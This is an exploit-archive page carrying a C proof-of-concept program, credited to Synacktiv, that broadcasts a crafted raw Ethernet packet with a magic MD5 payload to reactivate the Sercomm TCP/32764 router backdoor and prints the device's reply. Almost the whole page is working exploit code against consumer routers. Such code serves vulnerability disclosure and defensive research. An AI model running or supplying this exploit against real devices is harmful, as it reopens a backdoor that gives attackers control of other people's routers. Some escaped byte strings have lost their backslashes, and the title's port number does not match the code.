Home / exploits Sercomm TCP/32674 Backdoor Reactivation
Posted on 19 April 2014
/*************************************** * PoC to reactivate Sercomm TCP/32674 backdoor * See http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf * Eloi Vanderbeken - Synacktiv * * THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * PoC based on Wilmer van der Gaast's code * http://wiki.openwrt.org/_media/toh/netgear/dg834.g.v4/nftp.c ***************************************/ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <linux/if_ether.h> #include <linux/if_packet.h> #include <linux/if_arp.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #define ETH_P_NFTP 0x8888 enum backdoor_command { PING_BACKDOOR = 0x200, SCFGMGR_LAUNCH, SET_IP }; struct ether_header { unsigned char ether_dhost[ETH_ALEN]; unsigned char ether_shost[ETH_ALEN]; unsigned short ether_type; } eth; struct raw_packet { struct ether_header header; uint16_t type; uint16_t sequence; uint16_t offset; uint16_t chunk; uint16_t payload_len; uint8_t payload[528]; }; int main(int argc, char *argv[]) { int sockfd, res, i, len; char src_mac[ETH_ALEN]; struct ifreq iface; struct sockaddr_ll socket_address; struct raw_packet packet; memset(&packet, 0, sizeof(packet)); if (argc < 2) { fprintf(stderr, "usage : %s [IFNAME] ", argv[0]); exit(1); } sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd == -1) { if(geteuid() != 0) { fprintf(stderr, "You should probably run this program as root. "); } perror("socket"); exit(1); } seteuid(getuid()); strncpy(iface.ifr_name, argv[1], IFNAMSIZ); res = ioctl(sockfd, SIOCGIFHWADDR, &iface); if(res < 0) { perror("ioctl"); exit(1); } memcpy(src_mac, iface.ifr_hwaddr.sa_data, ETH_ALEN); res = ioctl(sockfd, SIOCGIFINDEX, &iface); if(res < 0) { perror("ioctl"); exit(1); } // set src mac memcpy(packet.header.ether_shost, src_mac, ETH_ALEN); // broadcast memset(packet.header.ether_dhost, 0xFF, ETH_ALEN); // MD5("DGN1000") memcpy(packet.payload, "x45xD1xBBx33x9Bx07xA6x61x8Bx21x14xDBxC0xD7x78x3E", 0x10); packet.payload_len = htole16(0x10); // ethernet packet type = 0x8888 packet.header.ether_type = htons(ETH_P_NFTP); // launch TCP/32764 backdoor packet.type = htole16(SCFGMGR_LAUNCH); socket_address.sll_family = PF_PACKET; socket_address.sll_protocol = htons(ETH_P_NFTP); socket_address.sll_ifindex = iface.ifr_ifindex; socket_address.sll_hatype = ARPHRD_ETHER; socket_address.sll_pkttype = PACKET_OTHERHOST; // broadcast socket_address.sll_halen = ETH_ALEN; memset(socket_address.sll_addr, 0xFF, ETH_ALEN); res = sendto(sockfd, &packet, 0x10 + 24, 0, (struct sockaddr *)&socket_address, sizeof(socket_address)); if (res == -1) { perror("sendto"); exit(1); } do { memset(&packet, 0, sizeof(packet)); res = recvfrom(sockfd, &packet, sizeof(packet), 0, NULL, NULL); if (res == -1) { perror("recvfrom"); exit(1); } } while (ntohs(packet.header.ether_type) != ETH_P_NFTP); if (res < sizeof(packet) - sizeof(packet.payload)) { fprintf(stderr, "packet is too short: %d bytes ", res); exit(1); } len = be16toh(packet.payload_len); // SerComm has a real problem with endianness printf("received packet: %d bytes (payload len = %d) from ", res, len); for (i = 0; i < ETH_ALEN; i++) printf("%02X%c", packet.header.ether_shost[i], i == ETH_ALEN-1 ? ' ' : ':'); for (i = 0; (i < len) && (i < sizeof(packet.payload)); i++) { printf("%02X ", packet.payload[i]); if ((i+1) % 16 == 0) printf(" "); } printf(" "); return 0; }
